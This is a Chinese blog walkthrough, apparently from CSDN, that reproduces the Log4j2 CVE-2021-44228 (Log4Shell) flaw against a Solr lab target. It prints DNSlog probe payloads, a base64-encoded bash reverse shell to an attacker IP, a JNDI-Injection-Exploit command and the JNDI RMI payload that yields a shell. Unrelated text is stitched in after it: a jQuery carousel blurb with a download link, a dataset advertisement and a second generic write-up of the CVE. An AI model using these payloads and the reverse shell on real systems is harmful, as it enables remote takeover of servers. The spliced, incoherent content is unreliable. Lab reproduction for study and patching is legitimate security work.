Log4j2:CVE-2021-44228漏洞复现

Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。

访问靶场

121.40.158.60:8983/solr/admin/cores?action=1

漏洞判定

利用dnslog

首先访问dnslog获取一个临时域名

然后利用获取到的临时域名构造payload ,直接访问

http://121.40.158.60:8983/solr/admin/cores?action=${jndi:ldap://s98m2z.dnslog.cn}
出现访问记录

漏洞利用

使用kali虚拟机下载JDNI注入工具

构造payload

并base64编码------ bash -i > /dev/tcp/192.168.192.128/6969 0>&1

在kali执行:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMTkyLjEyOC82OTY5IDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.192.128

得到了rmi、ldap参数

监听端口

在浏览器访问payload

121.40.158.60:8983/solr/admin/cores?action=${jndi:rmi://192.168.192.128:1099/wvsnvm}

发现kali这边监听到了,可以执行shell命令

完成

下载前可以先看下教程 https://pan.quark.cn/s/a426667488ae 标题“仿淘宝jquery图片左右切换带数字”揭示了这是一个关于运用jQuery技术完成的图片轮播机制,其特色在于具备淘宝在线平台普遍存在的图片切换表现,并且在整个切换环节中会展示当前图片的序列号。 此类功能一般应用于电子商务平台的产品呈现环节,使用户可以便捷地查看多张商品的照片。 说明中的“NULL”表示未提供进一步的信息,但我们可以借助标题来揣摩若干核心的技术要点。 在构建此类功能时,开发者通常会借助以下技术手段:1. **jQuery库**:jQuery是一个应用广泛的JavaScript框架,它简化了HTML文档的遍历、事件管理、动画效果以及Ajax通信。 在此项目中,jQuery将负责处理用户的点击动作(实现左右切换),并且制造流畅的过渡效果。 2. **图片轮播扩展工具**:开发者或许会采用现成的jQuery扩展,例如Slick、Bootstrap Carousel或个性化的轮播函数,以达成图片切换的功能。 这些扩展能够辅助迅速构建功能完善的轮播模块。 3. **即时数字呈现**:展示当前图片的序列号,这需要通过JavaScript或jQuery来追踪并调整。 每当图片切换时,相应的数字也会同步更新。 4. **CSS美化**:为了达成淘宝图片切换的视觉效果,可能需要设计特定的CSS样式,涵盖图片的排列方式、过渡效果、点状指示器等。 CSS3的动画和过渡特性(如`transition`和`animation`)在此过程中扮演关键角色。 5. **事件监测**:运用jQuery的`.on()`方法来监测用户的操作,比如点击左右控制按钮或自动按时间间隔切换。 根据用户的交互,触发相应的函数来执行...
垃圾实例分割数据集 一、基础信息 • 数据集名称:垃圾实例分割数据集 • 图片数量: 训练集:7,000张图片 验证集:426张图片 测试集:644张图片 • 训练集:7,000张图片 • 验证集:426张图片 • 测试集:644张图片 • 分类类别: 垃圾(Sampah) • 垃圾(Sampah) • 标注格式:YOLO格式,包含实例分割的多边形点坐标,适用于实例分割任务。 • 数据格式:图片文件 二、适用场景 • 智能垃圾检测系统开发:数据集支持实例分割任务,帮助构建能够自动识别和分割图像中垃圾区域的AI模型,适用于智能清洁机器人、自动垃圾桶等应用。 • 环境监控与管理:集成到监控系统中,用于实时检测公共区域的垃圾堆积,辅助环境清洁和治理决策。 • 计算机视觉研究:支持实例分割算法的研究和优化,特别是在垃圾识别领域,促进AI在环保方面的创新。 • 教育与实践:可用于高校或培训机构的AI课程,作为实例分割技术的实践数据集,帮助学生理解计算机视觉应用。 三、数据集优势 • 精确的实例分割标注:每个垃圾实例都使用详细的多边形点进行标注,确保分割边界准确,提升模型训练效果。 • 数据多样性:包含多种垃圾物品实例,覆盖不同场景,增强模型的泛化能力和鲁棒性。 • 格式兼容性强:YOLO标注格式易于与主流深度学习框架集成,如YOLO系列、PyTorch等,方便研究人员和开发者使用。 • 实际应用价值:直接针对现实世界的垃圾管理需求,为自动化环保解决方案提供可靠数据支持,具有重要的社会意义。
### CVE-2021-44228 漏洞复现分析 #### Log4j 的介绍 Log4j 是一个广泛使用的Java日志记录库,由Apache软件基金会开发。该库允许开发者通过配置文件灵活控制日志信息的格式、级别以及输出位置。 #### 漏洞概述 CVE-2021-44228是一个存在于Log4j 2.x系列中的严重远程代码执行漏洞。当应用程序使用了受影响版本的日志组件并处理特定模式字符串时,攻击者可以构造恶意输入触发JNDI注入,从而实现任意代码执行或敏感数据泄露[^1]。 #### 复现环境准备 为了安全地研究此漏洞,在隔离环境中搭建测试平台至关重要。通常情况下,这涉及到安装适当的操作系统镜像(如Kali Linux),确保已安装Java Development Kit (JDK),因为目标应用依赖于它来运行。具体来说,对于本案例而言,建议采用JDK 1.8版本[^2]。 #### 构建利用场景 构建模拟攻击的第一步是从GitHub仓库获取专门为此目的设计的工具集——`bkfish/Apache-Log4j-Learning`项目提供了详细的指南和必要的脚本支持。这些资源可以帮助研究人员快速设置好实验条件,并验证不同条件下漏洞的表现形式。 #### 利用方式实例化 一种常见的利用方法是在请求参数中嵌入特殊格式化的字符串表达式`${...}`,其中包含了指向外部LDAP服务器的数据源描述符。例如,向Solr服务发送如下所示的核心管理命令: ```bash http://target/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ib1ozt.dnslog.cn} ``` 这里`${sys:java.version}`会解析成当前系统的Java版本号作为子域名的一部分传递给DNS查询,以此证明存在潜在的安全风险[^4]。 #### 受影响范围确认 一旦成功触发漏洞,可以通过监控网络流量或者查看响应报文中携带的信息判断是否存在异常行为。比如观察到DNS请求中含有预期之外的内容,则表明可能已经遭受了非法入侵尝试;反之如果没有明显的迹象则说明防护措施有效阻止了威胁的发生。 #### 安全加固建议 针对此类高危级别的零日缺陷,官方及时发布了补丁程序修复问题所在之处。因此强烈推荐用户尽快升级至最新稳定版Log4j以消除隐患。除此之外,还应考虑采取其他辅助性的防御策略,诸如限制对外部资源加载权限、启用严格的输入校验机制等手段进一步增强安全性。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值